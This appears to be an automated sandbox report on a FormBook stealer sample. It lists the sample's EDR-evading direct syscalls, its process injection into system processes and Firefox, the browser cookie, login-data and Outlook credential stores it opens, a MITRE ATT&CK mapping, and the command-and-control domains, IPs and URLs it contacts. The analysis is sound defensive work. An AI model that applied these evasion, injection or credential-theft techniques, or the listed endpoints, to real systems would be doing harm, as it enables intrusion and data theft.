          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018B8B42 mov eax, dword ptr fs:[00000030h]0_2_018B8B42
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018A6B40 mov eax, dword ptr fs:[00000030h]0_2_018A6B40
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018A6B40 mov eax, dword ptr fs:[00000030h]0_2_018A6B40
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018DAB40 mov eax, dword ptr fs:[00000030h]0_2_018DAB40
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01808B50 mov eax, dword ptr fs:[00000030h]0_2_01808B50
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018E2B57 mov eax, dword ptr fs:[00000030h]0_2_018E2B57
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018E2B57 mov eax, dword ptr fs:[00000030h]0_2_018E2B57
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018E2B57 mov eax, dword ptr fs:[00000030h]0_2_018E2B57
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018E2B57 mov eax, dword ptr fs:[00000030h]0_2_018E2B57
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018BEB50 mov eax, dword ptr fs:[00000030h]0_2_018BEB50
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0180CB7E mov eax, dword ptr fs:[00000030h]0_2_0180CB7E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181EA80 mov eax, dword ptr fs:[00000030h]0_2_0181EA80
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181EA80 mov eax, dword ptr fs:[00000030h]0_2_0181EA80
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181EA80 mov eax, dword ptr fs:[00000030h]0_2_0181EA80
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181EA80 mov eax, dword ptr fs:[00000030h]0_2_0181EA80
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181EA80 mov eax, dword ptr fs:[00000030h]0_2_0181EA80
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181EA80 mov eax, dword ptr fs:[00000030h]0_2_0181EA80
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181EA80 mov eax, dword ptr fs:[00000030h]0_2_0181EA80
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181EA80 mov eax, dword ptr fs:[00000030h]0_2_0181EA80
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0181EA80 mov eax, dword ptr fs:[00000030h]0_2_0181EA80
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_018E4A80 mov eax, dword ptr fs:[00000030h]0_2_018E4A80
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01848A90 mov edx, dword ptr fs:[00000030h]0_2_01848A90
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01818AA0 mov eax, dword ptr fs:[00000030h]0_2_01818AA0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01818AA0 mov eax, dword ptr fs:[00000030h]0_2_01818AA0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01866AA4 mov eax, dword ptr fs:[00000030h]0_2_01866AA4
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01866ACC mov eax, dword ptr fs:[00000030h]0_2_01866ACC
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01866ACC mov eax, dword ptr fs:[00000030h]0_2_01866ACC
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01866ACC mov eax, dword ptr fs:[00000030h]0_2_01866ACC
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01810AD0 mov eax, dword ptr fs:[00000030h]0_2_01810AD0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01844AD0 mov eax, dword ptr fs:[00000030h]0_2_01844AD0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01844AD0 mov eax, dword ptr fs:[00000030h]0_2_01844AD0
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184AAEE mov eax, dword ptr fs:[00000030h]0_2_0184AAEE
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184AAEE mov eax, dword ptr fs:[00000030h]0_2_0184AAEE
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0189CA11 mov eax, dword ptr fs:[00000030h]0_2_0189CA11
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184CA24 mov eax, dword ptr fs:[00000030h]0_2_0184CA24
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0183EA2E mov eax, dword ptr fs:[00000030h]0_2_0183EA2E
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01834A35 mov eax, dword ptr fs:[00000030h]0_2_01834A35
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01834A35 mov eax, dword ptr fs:[00000030h]0_2_01834A35
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_0184CA38 mov eax, dword ptr fs:[00000030h]0_2_0184CA38
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01816A50 mov eax, dword ptr fs:[00000030h]0_2_01816A50
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01816A50 mov eax, dword ptr fs:[00000030h]0_2_01816A50
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01816A50 mov eax, dword ptr fs:[00000030h]0_2_01816A50
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeCode function: 0_2_01816A50 mov eax, dword ptr fs:[00000030h]0_2_01816A50

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtQueryValueKey: Direct from: 0x76EF2BECJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtProtectVirtualMemory: Direct from: 0x76EE7B2EJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtOpenKeyEx: Direct from: 0x76EF3C9CJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtClose: Direct from: 0x76EF2B6C
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeSection loaded: NULL target: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\lByv6mqTCJ.exeSection loaded: NULL target: C:\Windows\SysWOW64\grpconv.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: NULL target: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: NULL target: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\SysWOW64\grpconv.exeThread register set: target process: 7056Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Windows\SysWOW64\grpconv.exeThread APC queued: target process: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeJump to behavior
          Source: C:\Program Files (x86)\qCxIpusqZONCCjzbpJDffXbRFAcIKoXbBEQoEJrcdiBpRvwrym\ooaSzUjoYqoTW.exeProcess created: C:\Windows\SysWOW64\grpconv.exe "C:\Windows\SysWOW64\grpconv.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
          Source: lByv6mqTCJ.exe, 00000000.00000003.2097880175.000000000139D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SERPROFILE%setup.iniprogman.groupsprogman.onlydesktop.groupsstartup.groupssendto.groupsrecentdocs.groupsSoftware\Microsoft\Windows\CurrentVersionPreConvRenameFilesDeleteFilesRenameFilesSoftware\Microsoft\Windows\CurrentVersion\GrpConv/o-o.grpExceptionReturnHrLogHrFailFast%hs(%u)\%hs!%p: %hs!%p: (caller: %p) %hs(%d) tid(%x) %08X %ws Msg:[%ws] CallContext:[%hs] [%hs(%hs)]
          Source: ooaSzUjoYqoTW.exe, 00000002.00000002.3876330055.00000000015F1000.00000002.00000001.00040000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000002.00000000.2051716014.00000000015F1000.00000002.00000001.00040000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000005.00000002.3876554807.00000000013B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: lByv6mqTCJ.exe, 00000000.00000003.2097880175.000000000139D000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2131424199.00000000013A6000.00000004.00000020.00020000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000002.00000002.3876120909.000000000116E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FSoftware\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders".lnk%HOMEDRIVE%%HOMEPATH%.pif%USERPROFILE%setup.iniprogman.groupsprogman.onlydesktop.groupsstartup.groupssendto.groupsrecentdocs.groupsSoftware\Microsoft\Windows\CurrentVersionPreConvRenameFilesDeleteFilesRenameFilesSoftware\Microsoft\Windows\CurrentVersion\GrpConv/o-o.grpExceptionReturnHrLogHrFailFast%hs(%u)\%hs!%p: %hs!%p: (caller: %p) %hs(%d) tid(%x) %08X %ws Msg:[%ws] CallContext:[%hs] [%hs(%hs)]
          Source: ooaSzUjoYqoTW.exe, 00000002.00000002.3876330055.00000000015F1000.00000002.00000001.00040000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000002.00000000.2051716014.00000000015F1000.00000002.00000001.00040000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000005.00000002.3876554807.00000000013B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: ooaSzUjoYqoTW.exe, 00000002.00000002.3876330055.00000000015F1000.00000002.00000001.00040000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000002.00000000.2051716014.00000000015F1000.00000002.00000001.00040000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000005.00000002.3876554807.00000000013B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: ooaSzUjoYqoTW.exe, 00000002.00000002.3876330055.00000000015F1000.00000002.00000001.00040000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000002.00000000.2051716014.00000000015F1000.00000002.00000001.00040000.00000000.sdmp, ooaSzUjoYqoTW.exe, 00000005.00000002.3876554807.00000000013B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: lByv6mqTCJ.exe, 00000000.00000003.2097880175.000000000139D000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2131424199.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, lByv6mqTCJ.exe, 00000000.00000003.2097880175.00000000013B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FileDescriptionWindows Progman Group Converterh$

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.lByv6mqTCJ.exe.410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.3876568128.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3876436404.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2132420078.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3875595230.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3876687207.0000000005530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2134057488.0000000004430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
          Source: C:\Windows\SysWOW64\grpconv.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\grpconv.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 0.2.lByv6mqTCJ.exe.410000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.3876568128.0000000004330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2131471529.0000000000411000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3876436404.0000000002A10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2132420078.0000000001750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3875595230.0000000000620000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.3876687207.0000000005530000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2134057488.0000000004430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
          DLL Side-Loading          		312
          Process Injection          		2
          Virtualization/Sandbox Evasion          		1
          OS Credential Dumping          		121
          Security Software Discovery          		Remote Services1
          Email Collection          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Abuse Elevation Control Mechanism          		312
          Process Injection          		LSASS Memory2
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol1
          Archive Collected Data          		3
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		1
          Deobfuscate/Decode Files or Information          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin Shares1
          Data from Local System          		4
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Abuse Elevation Control Mechanism          		NTDS1
          Application Window Discovery          		Distributed Component Object ModelInput Capture4
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script4
          Obfuscated Files or Information          		LSA Secrets2
          File and Directory Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
          Software Packing          		Cached Domain Credentials12
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1530780 Sample: lByv6mqTCJ.exe Startdate: 10/10/2024 Architecture: WINDOWS Score: 100 24 www.nakama2-sshl.xyz 2->24 26 www.mudanya-nakliyat.xyz 2->26 28 16 other IPs or domains 2->28 36 Suricata IDS alerts for network traffic 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Antivirus / Scanner detection for submitted sample 2->40 44 4 other signatures 2->44 9 lByv6mqTCJ.exe 2->9         started        signatures3 42 Performs DNS queries to domains with low reputation 26->42 process4 signatures5 48 Maps a DLL or memory area into another process 9->48 12 ooaSzUjoYqoTW.exe 9->12 injected process6 signatures7 50 Found direct / indirect Syscall (likely to bypass EDR) 12->50 15 grpconv.exe 13 12->15         started        process8 signatures9 52 Tries to steal Mail credentials (via file / registry access) 15->52 54 Tries to harvest and steal browser information (history, passwords, etc) 15->54 56 Modifies the context of a thread in another process (thread injection) 15->56 58 3 other signatures 15->58 18 ooaSzUjoYqoTW.exe 15->18 injected 22 firefox.exe 15->22         started        process10 dnsIp11 30 www.nakama2-sshl.xyz 183.181.83.131, 49946, 49959, 49976 VECTANTARTERIANetworksCorporationJP Japan 18->30 32 www.trapkitten.website 195.161.68.8, 49989, 49990, 49991 RTCOMM-ASRU Russian Federation 18->32 34 6 other IPs or domains 18->34 46 Found direct / indirect Syscall (likely to bypass EDR) 18->46 signatures12

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          lByv6mqTCJ.exe76%ReversingLabsWin32.Backdoor.FormBook
          lByv6mqTCJ.exe100%AviraTR/Crypt.ZPACK.Gen
          lByv6mqTCJ.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://duckduckgo.com/chrome_newtab0%URL Reputationsafe
          https://duckduckgo.com/ac/?q=0%URL Reputationsafe
          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%URL Reputationsafe
          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
          https://www.ecosia.org/newtab/0%URL Reputationsafe
          https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
          https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.nakama2-sshl.xyz
          		183.181.83.131
          		truetrue
            		unknown
            rjscorp.org
            		3.33.130.190
            		truetrue
              		unknown
              www.jophy.life
              		162.0.238.246
              		truetrue
                		unknown
                wdeb18.top
                		206.119.82.147
                		truetrue
                  		unknown
                  www.trapkitten.website
                  		195.161.68.8
                  		truetrue
                    		unknown
                    www.comedy.finance
                    		13.248.169.48
                    		truetrue
                      		unknown
                      cluster580fc23f.abcty2.com
                      		45.194.36.12
                      		truetrue
                        		unknown
                        natroredirect.natrocdn.com
                        		85.159.66.93
                        		truetrue
                          		unknown
                          www.48vlu.shop
                          		unknown
                          		unknowntrue
                            		unknown
                            www.wdeb18.top
                            		unknown
                            		unknowntrue
                              		unknown
                              www.085bet.xyz
                              		unknown
                              		unknowntrue
                                		unknown
                                www.mudanya-nakliyat.xyz
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.kabaribukota.press
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.pussy.coupons
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.rjscorp.org
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.085bet.xyz/nn3h/true
                                          		unknown
                                          http://www.trapkitten.website/ucuo/true
                                            		unknown
                                            http://www.nakama2-sshl.xyz/bgpi/true
                                              		unknown
